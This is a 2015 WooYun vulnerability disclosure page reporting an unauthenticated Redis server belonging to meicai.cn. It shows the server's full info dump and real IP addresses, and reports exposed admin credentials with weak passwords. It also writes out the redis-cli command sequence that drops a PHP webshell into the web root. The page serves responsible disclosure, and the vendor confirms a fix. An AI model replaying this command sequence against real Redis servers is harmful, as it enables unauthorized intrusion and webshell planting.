当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0116600

漏洞标题:美菜配置不当-3(沦陷:商品+订单+仓储管理+采购+配送+门店 +微信帐号+供应商+数据统计+监控)

相关厂商:meicai.cn

漏洞作者: 爱上平顶山

提交时间:2015-05-28 09:52

修复时间:2015-07-12 22:54

公开时间:2015-07-12 22:54

漏洞类型:系统/服务运维配置不当

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-05-28: 细节已通知厂商并且等待厂商处理中
2015-05-28: 厂商已经确认,细节仅向厂商公开
2015-06-07: 细节向核心白帽子及相关领域专家公开
2015-06-17: 细节向普通白帽子公开
2015-06-27: 细节向实习白帽子公开
2015-07-12: 细节向公众公开

简要描述:

...

详细说明:

首先:
103.227.78.174 6379 Redis未授权访问:

103.227.78.174:0>info
# Server
redis_version:2.8.4
redis_git_sha1:00000000
redis_git_dirty:0
redis_build_id:a44a05d76f06a5d9
redis_mode:standalone
os:Linux 3.13.0-40-generic x86_64
arch_bits:64
multiplexing_api:epoll
gcc_version:4.8.2
process_id:28300
run_id:162ad9151062bf85375ffffe41fc2fc9d111c058
tcp_port:6379
uptime_in_seconds:7188735
uptime_in_days:83
hz:10
lru_clock:667450
config_file:
# Clients
connected_clients:43
client_longest_output_list:0
client_biggest_input_buf:0
blocked_clients:0
# Memory
used_memory:15533496
used_memory_human:14.81M
used_memory_rss:19869696
used_memory_peak:29648512
used_memory_peak_human:28.28M
used_memory_lua:33792
mem_fragmentation_ratio:1.28
mem_allocator:jemalloc-3.4.1
# Persistence
loading:0
rdb_changes_since_last_save:74
rdb_bgsave_in_progress:0
rdb_last_save_time:1432737156
rdb_last_bgsave_status:ok
rdb_last_bgsave_time_sec:0
rdb_current_bgsave_time_sec:-1
aof_enabled:0
aof_rewrite_in_progress:0
aof_rewrite_scheduled:0
aof_last_rewrite_time_sec:-1
aof_current_rewrite_time_sec:-1
aof_last_bgrewrite_status:ok
# Stats
total_connections_received:9902
total_commands_processed:8795662
instantaneous_ops_per_sec:0
rejected_connections:0
sync_full:0
sync_partial_ok:0
sync_partial_err:0
expired_keys:5470
evicted_keys:0
keyspace_hits:612311
keyspace_misses:6500171
pubsub_channels:0
pubsub_patterns:0
latest_fork_usec:594
# Replication
role:master
connected_slaves:0
master_repl_offset:0
repl_backlog_active:0
repl_backlog_size:1048576
repl_backlog_first_byte_offset:0
repl_backlog_histlen:0
# CPU
used_cpu_sys:896.06
used_cpu_user:1366.81
used_cpu_sys_children:79.05
used_cpu_user_children:480.75
# Keyspace
db0:keys=195,expires=172,avg_ttl=1083509001
103.227.78.174:0>


0.jpg


1.jpg


里面存储了大量admin的账号密码
后台:
http://stage.yunshanmeicai.com/ http://103.227.78.174:8080/

3.jpg


然后 解密 随机一个 zcy2@meicai.cn 密码居然是:1 大量密码都是1 无语

3.jpg


爆路径:http://103.227.78.174:4001/
测试写shell:
103.227.78.174:0>config set dir /data/www/
OK
103.227.78.174:0>config set dbfilename redis.php
OK
103.227.78.174:0>set webshell "<?php phpinfo(); ?>"
OK
103.227.78.174:0>save
OK
103.227.78.174:0>
ok 就这样

漏洞证明:

···

修复方案:

···

版权声明:转载请注明来源 爱上平顶山@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2015-05-28 22:09

厂商回复:

已修复

最新状态:

暂无